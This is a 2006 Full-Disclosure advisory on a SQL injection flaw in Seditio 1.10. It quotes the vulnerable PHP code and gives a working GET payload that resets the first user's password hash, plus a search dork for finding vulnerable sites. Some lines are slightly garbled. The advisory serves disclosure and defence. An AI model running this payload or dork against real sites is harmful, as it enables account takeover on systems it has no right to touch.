Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
[Full-disclosure] Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.

From: Mustafa Can Bjorn IPEKCI (nukedxnukedx.com)
Date: Tue Nov 21 2006 - 23:06:21 CST

--Security Report--
Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
Date: 21/10/06 09:44 PM
ICQ: 10072
MSN/Email: nukedxnukedx.com
Web: http://www.nukedx.com
Vendor: Neocrome (http://www.neocrome.net)
Version: 1.10 also prior versions must be affected.
About: Via this methods remote attacker can manipulate SQL query and
change everything in Seditio's user database.Vulnerable code can be
found in users.profile.inc.php at lines 108-116

-Source in system/core/users/users.profile.inc.php-
108: case 'avatarselect':
109: /* ============= */
111: sed_check_xg();
112: $avatar = $cfg['defav_dir'].urldecode($id);
113: if (file_exists($avatar))
114: { $sql = sed_sql_query("UPDATE $db_users SET
user_avatar='$avatar' WHERE user_id='".$usr['id']."'"); }
116: break;
-End of source-

As you can see "id" parameter did not sanitized properly and used with
urldecode() function which decodes id's value so remote attacker can
bypass magic_quotes_gpc and other functions which escapes ' strings.In
avatarselect Seditio checks files available with file_exists function
and urldecode help us by using null byte.
A demostration exploitation will be given in How&Example part.
Level: Highly Critical
GET ->
GET ->
http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of Seditio to
The XVALUE comes with your avatarselect link it's special to everyuser
in Seditio.
For using this vulnerability you must be logged in to Seditio...
* 21/10/2006: Vulnerability found.
* 21/10/2006: Contacted with vendor and waiting reply.
Original advisory can be found at: http://www.nukedx.com/?viewdoc=52
Exploit: http://www.nukedx.com/?getxpl=52
Dorks: "Powered by Seditio"

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/